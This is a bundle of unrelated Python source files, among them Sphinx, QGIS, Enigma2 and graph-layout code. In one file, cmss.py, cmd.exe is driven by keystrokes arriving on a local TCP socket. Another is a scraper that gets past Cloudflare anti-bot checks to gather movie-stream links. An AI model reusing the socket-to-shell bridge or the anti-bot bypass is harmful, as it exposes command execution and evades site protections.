index = self.structure.index(name)
col = self.structure[index]
self._values[name] = col.to_python(value, self)
self[index] = value
def _get_value(self, name):
if name not in self._values:
raw_value = self[self.structure.index(name)]
self._set_value(name, raw_value)
return self._values[name]
def _raw(self, name):
"""
Returns the raw value from field 'name'
"""
index = self.structure.index(name)
return self[index]
def _save(self):
for name in self._values:
index = self.structure.index(name)
col = self.structure[index]
self[index] = col.from_python(self._values[name])
def _field(self, name):
"""
Returns the field 'name'
"""
index = self.structure.index(name)
return self.structure[index]
def _default(self):
"""
Change all fields to their default values
"""
del self[:]
self._values = {}
for col in self.structure:
char = col.char
if col.dyn:
self.append(None)
elif char == "s":
self.append("")
elif char == "f":
self.append(0.0)
else:
self.append(0)
def dict(self):
"""
Return a dict of the row as colname: value
"""
return dict(zip(self.structure.column_names, self))
def update(self, other):
for k in other:
self[k] = other[k]
@property
def id(self):
"Temporary hack to transition between _id and id"
return self._id
|
boniatillo-com/PhaserEditor
|
docs/v2/conf.py
|
# -*- coding: utf-8 -*-
#
# Phaser Editor documentation build configuration file, created by
# sphinx-quickstart on Thu May 25 08:35:14 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
#'rinoh.frontend.sphinx'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Phaser Editor 2D'
copyright = u'2016-2020, Arian Fornaris'
author = u'Arian Fornaris'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = u'2.1.7'
# The full version, including alpha/beta/rc tags.
release = u'2.1.7'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
# pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
#import sphinx_rtd_theme
html_theme = "phaser-editor"
# Uncomment to generate the Eclipse offline help
#html_theme = "eclipse-help"
html_theme_path = ["_themes"]
html_show_sourcelink = False
html_show_sphinx = False
html_favicon = "logo.png"
html_title = "Phaser Editor Help"
html_show_copyright = True
print(html_theme_path)
#html_theme = 'classic'
highlight_language = 'javascript'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'PhaserEditordoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
'preamble': '',
# Latex figure (float) alignment
#
'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'PhaserEditor2D.tex', u'Phaser Editor 2D Documentation',
u'Arian Fornaris', 'manual'),
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'PhaserEditor2D', u'Phaser Editor 2D Documentation',
author, 'Arian', 'A friendly HTML5 game IDE.',
'Miscellaneous'),
]
|
camptocamp/QGIS
|
python/plugins/processing/saga/SplitRGBBands.py
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
SplitRGBBands.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
from processing.tools.system import *
from processing.tools import dataobjects
from processing.saga.SagaUtils import SagaUtils
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
from PyQt4 import QtGui
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.parameters.ParameterRaster import ParameterRaster
from processing.outputs.OutputRaster import OutputRaster
import os
class SplitRGBBands(GeoAlgorithm):
INPUT = "INPUT"
R = "R"
G = "G"
B = "B"
def getIcon(self):
return QtGui.QIcon(os.path.dirname(__file__) + "/../images/saga.png")
def defineCharacteristics(self):
self.name = "Split RGB bands"
self.group = "Grid - Tools"
self.addParameter(ParameterRaster(SplitRGBBands.INPUT, "Input layer", False))
self.addOutput(OutputRaster(SplitRGBBands.R, "Output R band layer"))
self.addOutput(OutputRaster(SplitRGBBands.G, "Output G band layer"))
self.addOutput(OutputRaster(SplitRGBBands.B, "Output B band layer"))
def processAlgorithm(self, progress):
#TODO:check correct num of bands
inputFile = self.getParameterValue(SplitRGBBands.INPUT)
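# Strip non-alphanumeric characters from the temp basename; SAGA handles plain names most reliably.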
temp = getTempFilename(None).replace('.', '')
basename = os.path.basename(temp)
validChars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
safeBasename = ''.join(c for c in basename if c in validChars)
temp = os.path.join(os.path.dirname(temp), safeBasename)
r = self.getOutputValue(SplitRGBBands.R)
g = self.getOutputValue(SplitRGBBands.G)
b = self.getOutputValue(SplitRGBBands.B)
commands = []
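# SAGA's GDAL bridge is the "io_gdal" module on Windows and "libio_gdal"
# elsewhere; importing the RGB raster yields one grid per band, named
# <temp>_0001.sgrd, <temp>_0002.sgrd and <temp>_0003.sgrd.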
if isWindows():
commands.append("io_gdal 0 -GRIDS \"" + temp + "\" -FILES \"" + input+"\"")
commands.append("io_gdal 1 -GRIDS \"" + temp + "_0001.sgrd\" -FORMAT 1 -TYPE 0 -FILE \"" + r + "\"");
commands.append("io_gdal 1 -GRIDS \"" + temp + "_0002.sgrd\" -FORMAT 1 -TYPE 0 -FILE \"" + g + "\"");
commands.append("io_gdal 1 -GRIDS \"" + temp + "_0003.sgrd\" -FORMAT 1 -TYPE 0 -FILE \"" + b + "\"");
else:
commands.append("libio_gdal 0 -GRIDS \"" + temp + "\" -FILES \"" + input + "\"")
commands.append("libio_gdal 1 -GRIDS \"" + temp + "_0001.sgrd\" -FORMAT 1 -TYPE 0 -FILE \"" + r + "\"");
commands.append("libio_gdal 1 -GRIDS \"" + temp + "_0002.sgrd\" -FORMAT 1 -TYPE 0 -FILE \"" + g + "\"");
commands.append("libio_gdal 1 -GRIDS \"" + temp + "_0003.sgrd\" -FORMAT 1 -TYPE 0 -FILE \"" + b + "\"");
SagaUtils.createSagaBatchJobFileFromSagaCommands(commands)
SagaUtils.executeSaga(progress)
|
ulethHCI/GLuskap
|
plugins/moment_curve.py
|
#!/usr/bin/python2.3
# This is the short name of the plugin, used as the menu item
# for the plugin.
# If not specified, the name of the file will be used.
shortname = "Moment Curve layout (Cohen et al. 1995)"
# This is the long name of the plugin, used as the menu note
# for the plugin.
# If not specified, the short name will be used.
name = "Moment Curve layout, O(n^3)"
DEBUG = False
def run(context, UI):
"""
Run this plugin.
"""
if len(context.graph.vertices) < 1:
generate = True
else:
res = UI.prYesNo("Use current graph?",
"Would you like to apply the layout to the current graph? If not, a complete graph will be generated and the current graph cleared.")
if res:
generate = False
# Go through and eliminate any existing bend points
from graph import DummyVertex
for v in [x for x in context.graph.vertices if isinstance(x, DummyVertex)]:
context.graph.removeVertex(v)
else:
generate = True
if generate:
N = UI.prType("Number of Vertices", "Input number of vertices to generate complete graph:", int, 4)
if N is None:
return True
while N < 0:
N = UI.prType("Number of Vertices",
"Please input positive value.\n\nInput number of vertices to generate complete graph:", int,
N)
if N is None:
return True
context.graph.clear()
# Generate a complete graph
k_n(context, N)
res = UI.prYesNo("Use mod-p layout?",
"Would you like to use the mod-p compact layout (O(n^3) volume)? If not, the O(n^6) uncompacted layout will be used.")
# Lay it out according to the 1bend layout
moment(context, compact=res)
context.camera.lookAtGraph(context.graph, context.graph.centerOfMass(), offset=context.graph.viewpoint())
return True
def k_n(C, n):
"""
k_n (C, n) -> void
Create a complete graph on n vertices in context C.
"""
from graph import Vertex, DummyVertex
G = C.graph
G.clear()
# Add n vertices
for i in range(n):
G.addVertex(Vertex(id='%d' % i, name='v%d' % i))
# For every pair of vertices (u, v):
for u in G.vertices:
for v in G.vertices:
# ignoring duplicates and u==v
if (u, v) not in G.edges and (v, u) not in G.edges and u != v:
# add an edge between u and v
G.addEdge((u, v))
def moment(C, compact=False):
"""
Run moment curve layout (Cohen, Eades, Lin, Ruskey 1995).
"""
G = C.graph
from math import sqrt, ceil, floor
from graph import DummyVertex, GraphError
import colorsys
vertices = [x for x in G.vertices if not isinstance(x, DummyVertex)]
n = len(vertices)
# Choose a prime p with n < p <= 2n
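# Bertrand's postulate guarantees a prime between n and 2n for any n > 1, so this search always succeeds.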
for p in range(n + 1, 2 * n + 1):
for div in range(2, p / 2 + 1):  # include p/2 itself so small composites like 4 are caught
if p % div == 0:
# print "%d is not a prime (div by %d)" % (p, div)
break
else:
# We did not find a divisor
# print "%d is a prime!" % p
break
else:
# Can't happen!
raise Exception("Can't find a prime between %d and %d!" % (n + 1, 2 * n))
# Position each vertex
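# The compact layout reduces coordinates mod p to shrink the bounding volume
# from O(n^6) to O(n^3); e.g. with p = 5, vertex 3 lands at (30, 40, 20)
# since (3*3) % 5 = 4 and (3*3*3) % 5 = 2, each scaled by 10.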
if compact:
for i in range(n):
G.modVertex(vertices[i]).pos = (i * 10, ((i * i) % p) * 10, ((i * i * i) % p) * 10)
else:
for i in range(n):
G.modVertex(vertices[i]).pos = (i, (i * i), (i * i * i))
return
|
repotvsupertuga/tvsupertuga.repository
|
script.module.openscrapers/lib/openscrapers/sources_openscrapers/en/coolmoviezone.py
|
# -*- coding: utf-8 -*-
# ..#######.########.#######.##....#..######..######.########....###...########.#######.########..######.
# .##.....#.##.....#.##......###...#.##....#.##....#.##.....#...##.##..##.....#.##......##.....#.##....##
# .##.....#.##.....#.##......####..#.##......##......##.....#..##...##.##.....#.##......##.....#.##......
# .##.....#.########.######..##.##.#..######.##......########.##.....#.########.######..########..######.
# .##.....#.##.......##......##..###.......#.##......##...##..########.##.......##......##...##........##
# .##.....#.##.......##......##...##.##....#.##....#.##....##.##.....#.##.......##......##....##.##....##
# ..#######.##.......#######.##....#..######..######.##.....#.##.....#.##.......#######.##.....#..######.
'''
OpenScrapers Project
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
import re
from openscrapers.modules import cleantitle, source_utils, cfscrape
class source:
def __init__(self):
self.priority = 1
self.language = ['en']
self.domains = ['coolmoviezone.online']
self.base_link = 'https://coolmoviezone.online'
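# cfscrape returns a requests-compatible session that solves Cloudflare's anti-bot challenge pages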
self.scraper = cfscrape.create_scraper()
def movie(self, imdb, title, localtitle, aliases, year):
try:
title = cleantitle.geturl(title)
url = self.base_link + '/%s-%s' % (title, year)
return url
except Exception:
return
def sources(self, url, hostDict, hostprDict):
try:
sources = []
r = self.scraper.get(url).content
match = re.compile('<td align="center"><strong><a href="(.+?)"').findall(r)
for url in match:
host = url.split('//')[1].replace('www.', '')
host = host.split('/')[0].split('.')[0].title()
quality = source_utils.check_sd_url(url)
sources.append({'source': host, 'quality': quality, 'language': 'en', 'url': url, 'direct': False,
'debridonly': False})
except Exception:
return
return sources
def resolve(self, url):
return url
|
ketan-analytics/learnpython
|
Safaribookonline-Python/courseware-btb/solutions/py3/patterns/properties_extra.py
|
'''
Ohm's law is a simple equation describing electrical circuits. It
states that the voltage V through a resistor is equal to the current
(I) times the resistance:
V = I * R
The units of these are volts, amperes (or "amps"), and ohms,
respectively. In real circuits, often R is actually measured in
kiloohms (10**3 ohms) and I in milliamps (10**-3 amps).
Let's create a Resistor class that models this behavior. The
constructor takes two arguments - the resistance in ohms, and the
voltage in volts:
>>> resistor = Resistor(800, 5.5)
>>> resistor.resistance
800
>>> resistor.voltage
5.5
The current is derived from these two using Ohm's law:
(Hint: use @property)
>>> resistor.current
0.006875
Since we may want the value in milliamps, let's make another property
to provide that:
>>> resistor.current_in_milliamps
6.875
Let's set it up so that we can change the current, and doing so will
correspondingly modify the voltage (but keep the resistance constant).
>>> resistor.current_in_milliamps = 3.5
>>> resistor.resistance
800
>>> round(resistor.voltage, 2)
2.8
>>> resistor.current = .006875
>>> round(resistor.voltage, 2)
5.5
>>> resistor.resistance
800
Also, we've made a design decision that a Resistor cannot change its
resistance value once created:
>>> resistor.resistance = 8200
Traceback (most recent call last):
AttributeError: can't set attribute
'''
# Write your code here:
class Resistor:
def __init__(self, resistance, voltage):
self._resistance = resistance
self.voltage = voltage
@property
def resistance(self):
return self._resistance
@property
def current(self):
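# Ohm's law rearranged: I = V / R (e.g. 5.5 V across 800 ohms gives 0.006875 A)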
return self.voltage / self.resistance
@current.setter
def current(self, value):
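# Setting the current keeps resistance fixed and recomputes the voltage: V = I * R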
self.voltage = self.resistance * value
@property
def current_in_milliamps(self):
return self.current * 1000
@current_in_milliamps.setter
def current_in_milliamps(self, value):
self.current = value / 1000
# Do not edit any code below this line!
if __name__ == '__main__':
import doctest
count, _ = doctest.testmod()
if count == 0:
print('*** ALL TESTS PASS ***\nGive someone a HIGH FIVE!')
# Copyright 2015-2018 Aaron Maxwell. All rights reserved.
|
arannasousa/pagseguro_xml
|
exemplos/testes_notificacao.py
|
# coding=utf-8
# ---------------------------------------------------------------
# Developer: Arannã Sousa Santos
# Month: 12
# Year: 2015
# Project: pagseguro_xml
# e-mail: asousas@live.com
# ---------------------------------------------------------------
import logging
from pagseguro_xml.notificacao import ApiPagSeguroNotificacao_v3, CONST_v3
logging.basicConfig(level=logging.DEBUG)
logger = logging.getLogger(__name__)
PAGSEGURO_API_AMBIENTE = u'sandbox'
PAGSEGURO_API_EMAIL = u'seu@email.com'
PAGSEGURO_API_TOKEN_PRODUCAO = u''
PAGSEGURO_API_TOKEN_SANDBOX = u''
CHAVE_NOTIFICACAO = u'AA0000-AA00A0A0AA00-AA00AA000000-AA0000' # this key is from production
api = ApiPagSeguroNotificacao_v3(ambiente=CONST_v3.AMBIENTE.SANDBOX)
PAGSEGURO_API_TOKEN = PAGSEGURO_API_TOKEN_PRODUCAO
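# NOTE: the client is configured for the sandbox, but the token and notification key above are production values; make these consistent before running.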
ok, retorno = api.consulta_notificacao_transacao_v3(PAGSEGURO_API_EMAIL, PAGSEGURO_API_TOKEN, CHAVE_NOTIFICACAO)
if ok:
print u'-' * 50
print retorno.xml
print u'-' * 50
for a in retorno.alertas:
print a
else:
print u'Error reason:', retorno
|
denys-duchier/Scolar
|
ZopeProducts/exUserFolder/Plugins.py
|
#
#
# (C) Copyright 2001 The Internet (Aust) Pty Ltd
# ACN: 082 081 472 ABN: 83 082 081 472
# All Rights Reserved
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
# OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
# OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
# SUCH DAMAGE.
#
# Author: Andrew Milton <akm@theinternet.com.au>
# $Id: Plugins.py,v 1.5 2004/11/10 14:15:33 akm Exp $
import App, Globals, OFS
import string
import time
from Globals import ImageFile, HTMLFile, HTML, MessageDialog, package_home
from OFS.Folder import Folder
class PluginRegister:
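# Ties a plugin class to the Zope forms and methods used to add and edit it.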
def __init__(self, name, description, pluginClass,
pluginStartForm, pluginStartMethod,
pluginEditForm=None, pluginEditMethod=None):
self.name = name  # No spaces please...
self.description = description
self.plugin = pluginClass
self.manage_addForm = pluginStartForm
self.manage_addMethod = pluginStartMethod
self.manage_editForm = pluginEditForm
self.manage_editMethod = pluginEditMethod
class CryptoPluginRegister:
def __init__(self, name, crypto, description, pluginMethod):
self.name = name  # No spaces please...
self.cryptoMethod = crypto
self.description = description
self.plugin = pluginMethod
|
hylom/grrreader
|
backend/feedfetcher.py
|
#!/usr/bin/python
"feed fetcher"
from db import MySQLDatabase
from fetcher import FeedFetcher
def main():
db = MySQLDatabase()
fetcher = FeedFetcher()
feeds = db.get_feeds(offset=0, limit=10)
read_count = 10
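# Walk the feed table in pages of ten rows until an empty page comes back.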
while len(feeds) > 0:
for feed in feeds:
fid = feed[0]
url = feed[1]
title = feed[2]
print "fetching #{0}: {1}".format(fid, url)
entries = fetcher.fetch(url)
for entry in entries:
entry.feed_id = fid
try:
print "insert {0}".format(entry.url)
except UnicodeEncodeError:
print "insert {0}".format(entry.url.encode('utf-8'))
db.append_feed_content(entry)
feeds = db.get_feeds(offset=read_count, limit=10)
read_count += 10
if __name__ == '__main__':
main()
|
droundy/deft
|
papers/hughes-saft/figs/density_calc.py
|
#!/usr/bin/env python
import math
fin = open('figs/single-rod-in-water.dat', 'r')
fout = open('figs/single-rods-calculated-density.dat', 'w')
kB = 3.16681539628059e-6 # This is Boltzmann's constant in Hartree/Kelvin
first = True
nm = 18.8972613
for line in fin:
current = str(line)
pieces = current.split('\t')
if first:
r2 = float(pieces[0])/2*nm
E2 = float(pieces[1])
first = False
else:
if ((float(pieces[0])/2*nm - r2) > 0.25):
r1 = r2
r2 = float(pieces[0])/2*nm
E1 = E2
E2 = float(pieces[1]) # actually it's energy per unit length!
length = 1 # arbitrary
r = (r1 + r2)/2
dEdR = (E2-E1)/(r2-r1)*length
area = 2*math.pi*r*length
force = dEdR
pressure = force/area
kT = kB*298 # thermal energy at roughly room temperature (298 K)
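# Contact-value theorem: the fluid density at contact with the rod equals pressure/kT.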
ncontact = pressure/kT
fout.write(str(r)+'\t'+str(ncontact)+'\n')
fin.close()
fout.close()
|
viswimmer1/PythonGenerator
|
data/python_files/34574373/cmss.py
|
import win32pipe
import win32console
import win32process
import time
import win32con
import codecs
import ctypes
user32 = ctypes.windll.user32
CONQUE_WINDOWS_VK = {
'3' : win32con.VK_CANCEL,
'8' : win32con.VK_BACK,
'9' : win32con.VK_TAB,
'12' : win32con.VK_CLEAR,
'13' : win32con.VK_RETURN,
'17' : win32con.VK_CONTROL,
'20' : win32con.VK_CAPITAL,
'27' : win32con.VK_ESCAPE,
'28' : win32con.VK_CONVERT,
'35' : win32con.VK_END,
'36' : win32con.VK_HOME,
'37' : win32con.VK_LEFT,
'38' : win32con.VK_UP,
'39' : win32con.VK_RIGHT,
'40' : win32con.VK_DOWN,
'45' : win32con.VK_INSERT,
'46' : win32con.VK_DELETE,
'47' : win32con.VK_HELP
}
def make_input_key(c, control_key_state=None):
kc = win32console.PyINPUT_RECORDType (win32console.KEY_EVENT)
kc.KeyDown = True
kc.RepeatCount = 1
cnum = ord(c)
if cnum == 3:
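# Ctrl-C cannot be injected as an ordinary key event, so signal the whole console instead.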
pid_list = win32console.GetConsoleProcessList()
win32console.GenerateConsoleCtrlEvent(win32con.CTRL_C_EVENT, 0)
return
else:
kc.Char = unicode(c)
if str(cnum) in CONQUE_WINDOWS_VK:
kc.VirtualKeyCode = CONQUE_WINDOWS_VK[str(cnum)]
else:
kc.VirtualKeyCode = ctypes.windll.user32.VkKeyScanA(cnum)
#kc.VirtualKeyCode = ctypes.windll.user32.VkKeyScanA(cnum+96)
#kc.ControlKeyState = win32con.LEFT_CTRL_PRESSED
return kc
#win32console.AttachConsole()
coord = win32console.PyCOORDType
con_stdout = win32console.GetStdHandle(win32console.STD_OUTPUT_HANDLE)
con_stdin = win32console.GetStdHandle(win32console.STD_INPUT_HANDLE)
flags = win32process.NORMAL_PRIORITY_CLASS
si = win32process.STARTUPINFO()
si.dwFlags |= win32con.STARTF_USESHOWWINDOW
(handle1, handle2, i1, i2) = win32process.CreateProcess(None, "cmd.exe", None, None, 0, flags, None, '.', si)
time.sleep(1)
#size = con_stdout.GetConsoleScreenBufferInfo()['Window']
# with codecs.open("log.txt", "w", "utf8") as f:
# for i in xrange(0, size.Bottom):
# f.write(con_stdout.ReadConsoleOutputCharacter(size.Right+1, coord(0, i)))
# f.write("\n")
import socket
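# Accept a single TCP client and forward each byte it sends to the console as a keystroke; a zero byte ends the session.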
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
HOST = "127.0.0.1"
PORT = 5554
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(1)
(sc, scname) = s.accept()
while True:
msg = sc.recv(1)
if ord(msg) == 0:
break
keys = [make_input_key(msg)]
if keys:
con_stdin.WriteConsoleInput(keys)
win32process.TerminateProcess(handle1, 0)
|
deggis/drinkcounter
|
clients/s60-python/client.py
|
import urllib2
import appuifw, e32
from key_codes import *
class Drinker(object):
def __init__(self):
self.id = 0
self.name = ""
self.prom = 0.0
self.idle = ""
self.drinks = 0
def get_drinker_list():
data = urllib2.urlopen("http://192.168.11.5:8080/drinkcounter/get_datas/").read().split("\n")
drinkers = []
for data_row in data:
if data_row == '': continue
fields = data_row.split('|')
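# Each row has the form id|name|drinks|prom|idle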
drinker = Drinker()
drinker.id = int(fields[0])
drinker.name = fields[1]
drinker.drinks = int(fields[2])
drinker.prom = float(fields[3])
drinker.idle = fields[4]
drinkers.append(drinker)
return drinkers
def get_listbox_items(drinkers):
items = []
for drinker in drinkers:
items.append(unicode('%s, %d drinks, %s' % (drinker.name, drinker.drinks, drinker.idle)))
return items
appuifw.app.title = u"Alkoholilaskuri"
app_lock = e32.Ao_lock()
#Define the exit function
def quit():
app_lock.signal()
appuifw.app.exit_key_handler = quit
drinkers = get_drinker_list()
items = get_listbox_items(drinkers)
#Define a function that is called when an item is selected
def handle_selection():
global drinkers
selected_drinker = drinkers[lb.current()]
urllib2.urlopen("http://192.168.11.5:8080/drinkcounter/add_drink/%d/" % (selected_drinker.id))
appuifw.note(u"A drink has been added to " + selected_drinker.name, 'info')
# Refresh the module-level list so later selections index the current data
drinkers = get_drinker_list()
items = get_listbox_items(drinkers)
lb.set_list(items, lb.current())
#Create an instance of Listbox and set it as the application's body
lb = appuifw.Listbox(items, handle_selection)
appuifw.app.body = lb
app_lock.wait()
|
eesatfan/vuplus-enigma2
|
lib/python/Components/AVSwitch.py
|
from config import config, ConfigSlider, ConfigSelection, ConfigYesNo, \
ConfigEnableDisable, ConfigSubsection, ConfigBoolean, ConfigSelectionNumber, ConfigNothing, NoSave
from enigma import eAVSwitch, getDesktop
from SystemInfo import SystemInfo
from os import path as os_path
class AVSwitch:
def setInput(self, input):
INPUT = { "ENCODER": 0, "SCART": 1, "AUX": 2 }
eAVSwitch.getInstance().setInput(INPUT[input])
def setColorFormat(self, value):
eAVSwitch.getInstance().setColorFormat(value)
def setAspectRatio(self, value):
eAVSwitch.getInstance().setAspectRatio(value)
def setSystem(self, value):
eAVSwitch.getInstance().setVideomode(value)
def getOutputAspect(self):
valstr = config.av.aspectratio.value
if valstr in ("4_3_letterbox", "4_3_panscan"): # 4:3
return (4,3)
elif valstr == "16_9": # auto ... 4:3 or 16:9
try:
aspect_str = open("/proc/stb/vmpeg/0/aspect", "r").read()
if aspect_str == "1": # 4:3
return (4,3)
except IOError:
pass
elif valstr in ("16_9_always", "16_9_letterbox"): # 16:9
pass
elif valstr in ("16_10_letterbox", "16_10_panscan"): # 16:10
return (16,10)
return (16,9)
def getFramebufferScale(self):
aspect = self.getOutputAspect()
fb_size = getDesktop(0).size()
return (aspect[0] * fb_size.height(), aspect[1] * fb_size.width())
def getAspectRatioSetting(self):
valstr = config.av.aspectratio.value
if valstr == "4_3_letterbox":
val = 0
elif valstr == "4_3_panscan":
val = 1
elif valstr == "16_9":
val = 2
elif valstr == "16_9_always":
val = 3
elif valstr == "16_10_letterbox":
val = 4
elif valstr == "16_10_panscan":
val = 5
elif valstr == "16_9_letterbox":
val = 6
return val
def setAspectWSS(self, aspect=None):
if not config.av.wss.value:
value = 2 # auto(4:3_off)
else:
value = 1 # auto
eAVSwitch.getInstance().setWSS(value)
def InitAVSwitch():
config.av = ConfigSubsection()
config.av.yuvenabled = ConfigBoolean(default=False)
colorformat_choices = {"cvbs": _("CVBS"), "rgb": _("RGB"), "svideo": _("S-Video")}
# when YUV is not enabled, don't let the user select it
if config.av.yuvenabled.value:
colorformat_choices["yuv"] = _("YPbPr")
# ikseong
config.av.colorformat = ConfigSelection(choices=colorformat_choices, default="cvbs")
config.av.aspectratio = ConfigSelection(choices={
"4_3_letterbox": _("4:3 Letterbox"),
"4_3_panscan": _("4:3 PanScan"),
"16_9": _("16:9"),
"16_9_always": _("16:9 always"),
"16_10_letterbox": _("16:10 Letterbox"),
"16_10_panscan": _("16:10 PanScan"),
"16_9_letterbox": _("16:9 Letterbox")},
default = "4_3_letterbox")
config.av.aspect = ConfigSelection(choices={
"4_3": _("4:3"),
"16_9": _("16:9"),
"16_10": _("16:10"),
"auto": _("Automatic")},
default = "auto")
config.av.policy_169 = ConfigSelection(choices={
# TRANSLATORS: (aspect ratio policy: black bars on top/bottom) in doubt, keep english term.
"letterbox": _("Letterbox"),
# TRANSLATORS: (aspect ratio policy: cropped content on left/right) in doubt, keep english term
"panscan": _("Pan&Scan"),
# TRANSLATORS: (aspect ratio policy: display as fullscreen, even if this breaks the aspect)
"scale": _("Just Scale")},
default = "letterbox")
config.av.policy_43 = ConfigSelection(choices={
# TRANSLATORS: (aspect ratio policy: black bars on left/right) in doubt, keep english term.
"pillarbox": _("Pillarbox"),
# TRANSLATORS: (aspect ratio policy: cropped content on left/right) in doubt, keep english term
"panscan": _("Pan&Scan"),
# TRANSLATORS: (aspect ratio policy: display as fullscreen, with stretching the left/right)
"nonlinear": _("Nonlinear"),
# TRANSLATORS: (aspect ratio policy: display as fullscreen, even if this breaks the aspect)
"scale": _("Just Scale")},
default = "pillarbox")
config.av.tvsystem = ConfigSelection(choices = {"pal": _("PAL"), "ntsc": _("NTSC"), "multinorm": _("multinorm")}, default="pal")
config.av.wss = ConfigEnableDisable(default = True)
config.av.defaultac3 = ConfigYesNo(default = False)
config.av.generalAC3delay = ConfigSelectionNumber(-1000, 1000, 25, default = 0)
config.av.generalPCMdelay = ConfigSelectionNumber(-1000, 1000, 25, default = 0)
config.av.vcrswitch = ConfigEnableDisable(default = False)
iAVSwitch = AVSwitch()
def setColorFormat(configElement):
map = {"cvbs": 0, "rgb": 1, "svideo": 2, "yuv": 3}
iAVSwitch.setColorFormat(map[configElement.value])
def setAspectRatio(configElement):
map = {"4_3_letterbox": 0, "4_3_panscan": 1, "16_9": 2, "16_9_always": 3, "16_10_letterbox": 4, "16_10_panscan": 5, "16_9_letterbox" : 6}
iAVSwitch.setAspectRatio(map[configElement.value])
def setSystem(configElement):
map = {"pal": 0, "ntsc": 1, "multinorm" : 2}
iAVSwitch.setSystem(map[configElement.value])
def setWSS(configElement):
iAVSwitch.setAspectWSS()
# this will call the "setup-val" initial
config.av.colorformat.addNotifier(setColorFormat)
config.av.aspectratio.addNotifier(setAspectRatio)
config.av.tvsystem.addNotifier(setSystem)
config.av.wss.addNotifier(setWSS)
iAVSwitch.setInput("ENCODER") # init on startup
SystemInfo["ScartSwitch"] = eAVSwitch.getInstance().haveScartSwitch()
try:
can_downmix = open("/proc/stb/audio/ac3_choices", "r").read()[:-1].find("downmix") != -1
except:
can_downmix = False
SystemInfo["CanDownmixAC3"] = can_downmix
if can_downmix:
def setAC3Downmix(configElement):
open("/proc/stb/audio/ac3", "w").write(configElement.value and "downmix" or "passthrough")
config.av.downmix_ac3 = ConfigYesNo(default = True)
config.av.downmix_ac3.addNotifier(setAC3Downmix)
